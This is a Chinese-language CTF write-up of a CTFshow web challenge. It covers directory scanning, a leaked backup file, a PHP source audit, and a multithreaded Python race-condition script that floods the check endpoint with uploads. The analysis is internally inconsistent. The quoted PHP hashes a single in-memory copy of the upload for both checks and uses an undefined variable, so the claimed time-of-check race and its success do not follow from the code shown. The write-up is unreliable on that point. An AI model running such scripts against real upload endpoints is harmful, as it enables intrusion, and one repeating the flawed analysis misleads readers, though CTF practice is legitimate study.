CTFshow Web红包题第六弹实战复盘：我是如何用Python脚本+条件竞争拿下flag的

CTFshow Web红包题第六弹实战复盘：从迷茫到顿悟的解题之旅

第一次看到这个题目时，我盯着屏幕足足发呆了五分钟。作为一个刚入门CTF的新手，面对这个看似简单的Web题目，却完全不知道从何下手。题目界面简洁得令人发慌——只有一个输入框和一个提交按钮，没有任何提示信息。这种"空白画布"式的题目往往最考验选手的综合能力。

1. 信息收集：从零开始的侦察工作

在CTF比赛中，信息收集永远是第一步。我首先尝试了最基础的操作：

curl -I http://target.url

返回的HTTP头信息并没有透露太多有用内容。于是我开始考虑目录扫描，这是Web题目中最常见的突破口。经过对比几个工具后，我选择了dirmap进行深度扫描：

python3 dirmap.py -i http://target.url -lcf

扫描结果中出现了一个意外的发现——web.zip文件。下载解压后，里面包含了一个check.php.bak文件，这正是解题的关键线索。这种备份文件泄露在真实世界的Web安全漏洞中也十分常见，开发者常常会无意中将开发环境中的备份文件留在生产服务器上。

提示：在CTF比赛中，常见的备份文件后缀包括.bak、.swp、.orig等，养成检查这些文件的习惯能帮你快速找到突破口。

2. 源码审计：逆向思维破解逻辑漏洞

获得源码后，我开始仔细分析check.php的逻辑。核心代码段如下：

$token = md5(date("i")); if($_GET['token'] != $token){ die("token error"); } $user_file = $_FILES['file']['tmp_name']; $file_contents = file_get_contents($user_file); $file_md5 = md5($file_contents); $file_sha = hash('sha512',$file_contents); if($file_md5 == $file_md5_real){ if($file_sha != $file_sha_real){ echo $flag; } }

这段代码有几个关键点需要注意：

1. token基于当前分钟数生成，有效期只有60秒
2. 需要上传的文件必须满足两个矛盾条件：
   • MD5哈希与服务器上的key.dat文件相同
   • SHA512哈希与服务器上的key.dat文件不同

3. 突破思路：条件竞争的发现与利用

面对这个看似矛盾的检查条件，我陷入了思考。如何在同一个文件中同时满足MD5相同但SHA512不同？经过反复推敲，我意识到这可能是一个条件竞争漏洞。

服务器的工作流程可能是：

1. 将上传的文件临时保存为flag.dat
2. 检查该文件的MD5是否与key.dat相同
3. 如果是，再检查SHA512是否不同
4. 如果都满足，返回flag

关键在于，如果在MD5检查之后、SHA512检查之前，我们能够修改flag.dat文件的内容，就能满足这个矛盾条件。这就是典型的TOCTOU(Time of Check, Time of Use)漏洞。

4. 脚本编写：多线程攻击的实现

为了实现这个攻击，我需要编写一个Python脚本，同时发送两种不同的文件内容：

1. 与key.datMD5相同的原始文件
2. 任意构造的不同内容文件

通过高频率的并发请求，增加竞争条件触发的概率。以下是最终的攻击脚本：

import requests import hashlib import threading from datetime import datetime # 获取当前分钟数生成token current_minute = datetime.now().minute token = hashlib.md5(str(current_minute).encode()).hexdigest() # 读取本地的key.dat文件 with open('key.dat', 'rb') as f: original_data = f.read() # 构造不同的数据 modified_data = b'different_content' def upload_file(data): try: files = {'file': ('exploit.dat', data)} params = {'token': token} response = requests.post( 'http://target.url/check.php', files=files, params=params ) if 'ctfshow{' in response.text: print("[+] Flag found:", response.text) except Exception as e: print("[-] Error:", e) # 启动多个线程进行攻击 for i in range(30): threading.Thread(target=upload_file, args=(original_data,)).start() for i in range(30): threading.Thread(target=upload_file, args=(modified_data,)).start()

这个脚本的关键点在于：

1. 时间同步：准确获取当前分钟数生成有效token
2. 并发控制：使用多线程同时发送两种不同内容的文件
3. 结果捕获：检查响应中是否包含flag格式的内容

5. 调试过程：踩坑与解决方案

在实际操作中，我遇到了几个棘手的问题：

1. 时间不同步：本地时间与服务器时间可能存在差异，导致token无效

   • 解决方案：增加时间同步检查，或扩大时间窗口尝试

2. 并发不足：初始设置的线程数太少，难以触发竞争条件

   • 解决方案：逐步增加线程数，找到最佳平衡点

3. 网络延迟：请求响应时间不稳定影响攻击效果

   • 解决方案：使用更稳定的网络环境，或增加重试机制

经过多次调整参数和反复尝试，最终在某个瞬间成功触发了竞争条件，获取到了flag。那一刻的成就感，正是CTF比赛最吸引人的地方。

6. 经验总结与延伸思考

这次解题经历让我深刻理解了几个重要的安全概念：

1. 备份文件泄露：开发过程中产生的备份文件可能成为攻击入口
2. 条件竞争漏洞：检查与使用之间的时间差可能被利用
3. 哈希算法特性：理解不同哈希算法的特点有助于发现逻辑漏洞

在实际的Web应用开发中，避免这类漏洞的方法包括：

• 禁止在生产环境存放备份文件
• 对关键操作使用原子性操作
• 在检查和使用之间尽量减少时间差
• 对上传文件进行严格的权限控制和隔离

这次CTFshow的红包题虽然只是一个小题目，但涵盖的知识点却非常丰富。从信息收集到源码审计，再到漏洞利用的完整链条，让我对Web安全有了更深入的理解。最令我兴奋的不是最终拿到flag，而是在思考过程中那个"灵光一现"的瞬间——当意识到可以利用条件竞争突破看似无解的检查逻辑时，那种豁然开朗的感觉正是CTF比赛的魅力所在。